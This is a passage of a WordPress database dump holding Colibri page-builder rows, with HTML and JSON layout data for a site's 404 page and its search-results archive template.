</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_404','','publish','closed','closed','','37','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_main&p=37',0,'extb_post_main','',0),(38,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":0,\"id\":\"37-m4\",\"partialId\":37,\"styleRef\":134,\"type\":\"main\",\"props\":{\"content\":\"404\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":1,\"id\":\"37-m5\",\"partialId\":37,\"styleRef\":135,\"type\":\"main\",\"props\":{\"content\":\"<p>Sorry, page not found!<\\/p>\"}},{\"name\":\"hop-home-button-group\",\"children\":[{\"name\":\"hop-home-button\",\"props\":{\"text\":\"Go to Homepage!\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"37-m7\",\"parentId\":\"37-m6\",\"partialId\":37,\"styleRef\":137,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"37-m3\",\"index\":2,\"id\":\"37-m6\",\"partialId\":37,\"styleRef\":136,\"type\":\"main\"}],\"id\":\"37-m3\",\"parentId\":\"37-m2\",\"partialId\":37,\"styleRef\":133,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}}],\"id\":\"37-m2\",\"parentId\":\"37-m1\",\"partialId\":37,\"styleRef\":132,\"type\":\"main\",\"props\":{\"name\":\"Nothing found\",\"attrs\":{\"id\":\"nothing-found\"}}}],\"id\":\"37-m1\",\"partialId\":37,\"styleRef\":131,\"type\":\"main\"}','','','publish','closed','closed','','38','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=38',0,'extb_post_json','',0),(39,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n <!---->\n <!---->\n <h2 class=\"\">404</h2>\n </div>\n <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Sorry, page not found!</p>\n </div>\n </div>\n <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\" data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span> <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_404','','inherit','closed','closed','','37-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',37,'https://gsudice.dataconn.net/?p=39',0,'revision','',0),(40,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2240-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2240-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2240-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2240-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%2240-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2240-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2240-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%2240-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%2240-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n <!---->\n <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n <!---->\n <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]\n <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <hop-archive-navigation previewid=\"40-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_search','','publish','closed','closed','','40','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_main&p=40',0,'extb_post_main','',0),(41,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"40-m5\",\"parentId\":\"40-m4\",\"partialId\":40,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"40-m5\",\"index\":1,\"id\":\"40-m6\",\"partialId\":40,\"styleRef\":143,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":142,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":1,\"id\":\"40-m4\",\"partialId\":40,\"styleRef\":141,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"parentId\":\"40-m3\",\"id\":\"40-m7\",\"partialId\":40,\"styleRef\":144,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-meta\",\"parentId\":\"40-m3\",\"id\":\"40-m8\",\"partialId\":40,\"styleRef\":145,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"| \"},\"slot\":null,\"index\":3},{\"name\":\"hop-post-excerpt\",\"id\":\"40-m9\",\"parentId\":\"40-m3\",\"partialId\":40,\"styleRef\":146,\"type\":\"main\"},{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"40-m11\",\"parentId\":\"40-m10\",\"partialId\":40,\"styleRef\":148,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m3\",\"index\":4,\"id\":\"40-m10\",\"partialId\":40,\"styleRef\":147,\"type\":\"main\"}],\"id\":\"40-m3\",\"parentId\":\"40-m2\",\"partialId\":40,\"styleRef\":140,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"40-m1\",\"index\":0,\"id\":\"40-m2\",\"partialId\":40,\"styleRef\":139,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"40-m13\",\"parentId\":\"40-m12\",\"partialId\":40,\"styleRef\":150,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m14\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m14\",\"index\":0,\"id\":\"40-m15\",\"partialId\":40,\"styleRef\":152,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"stateType\":\"hover\",\"prevLabel\":\"Back\"}}],\"styleRef\":151,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m16\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"40-m16\",\"index\":0,\"id\":\"40-m17\",\"partialId\":40,\"styleRef\":154,\"type\":\"main\",\"props\":{\"stateType\":\"active\"}}],\"styleRef\":153,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m18\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m18\",\"index\":0,\"id\":\"40-m19\",\"partialId\":40,\"styleRef\":156,\"type\":\"main\",\"props\":{\"stateType\":\"hover\",\"nextLabel\":\"Next\"}}],\"styleRef\":155,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m1\",\"index\":4,\"id\":\"40-m12\",\"partialId\":40,\"styleRef\":149,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-archive-navigation\",\"slot\":null,\"parentId\":\"40-m21\",\"index\":1,\"id\":\"40-m22\",\"partialId\":40,\"styleRef\":159,\"type\":\"main\"}],\"id\":\"40-m21\",\"parentId\":\"40-m20\",\"partialId\":40,\"styleRef\":158,\"type\":\"main\"}],\"id\":\"40-m20\",\"parentId\":\"40-m1\",\"partialId\":40,\"styleRef\":157,\"type\":\"main\",\"props\":{\"name\":\"Search results\",\"attrs\":{\"id\":\"search-results\"}}}],\"id\":\"40-m1\",\"partialId\":40,\"styleRef\":138,\"type\":\"main\"}','','','publish','closed','closed','','41','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=41',0,'extb_post_json','',0),(42,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22639-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22639-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22639-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22639-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%22639-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%22639-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22639-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%3Csvg%20version=%221.1%22%20xmlns=%22http://www.w3.org/2000/svg%22%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20id=%22arrow-right%22%20viewBox=%220%200%20512%20545.5%22%3E%3Cpath%20d=%22M299.5%20140.5l136%20136%2011%2011.5-11%2011.5-136%20136-23-23L385%20304H64v-32h321L276.5%20163.5z%22%3E%3C/path%3E%3C/svg%3E%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start 